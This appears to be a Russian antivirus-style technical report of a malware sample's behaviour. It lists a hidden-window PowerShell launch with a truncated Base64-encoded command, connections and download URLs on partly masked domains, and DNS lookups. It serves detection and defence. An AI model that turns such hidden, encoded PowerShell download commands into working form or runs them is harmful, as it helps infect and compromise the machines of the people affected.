Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e KAAoACgAIgB7ADYANwB9AHsANQAwAH0AewA5ADEAfQB7ADEAMgAzAH0AewAyADcAfQB7ADYANgB9AHsANQA5AH0AewAxADEAOAB9AHsANAA2AH0AewAxADEANQB9AHsANQAzAH0AewAxADQAfQB7ADIAfQB7ADUANgB9AHsAOQ...
- 'wi###wlock.com':80
- 'ni###coder.me':80
- 'wa###2wire.com':80
- http://wi###wlock.com/rp9SN/
- http://ni###coder.me/ceyNt/
- http://wa###2wire.com/eFz0dRnulB/
- DNS ASK bi##abi.net
- DNS ASK it######gsolutions.com.au
- DNS ASK wi###wlock.com
- DNS ASK ni###coder.me
- DNS ASK wa###2wire.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e KAAoACgAIgB7ADYANwB9AHsANQAwAH0AewA5ADEAfQB7ADEAMgAzAH0AewAyADcAfQB7ADYANgB9AHsANQA5AH0AewAxADEAOAB9AHsANAA2AH0AewAxADEANQB9AHsANQAzAH0AewAxADQAfQB7ADIAfQB7ADUANgB9AHsAOQ...' (со скрытым окном)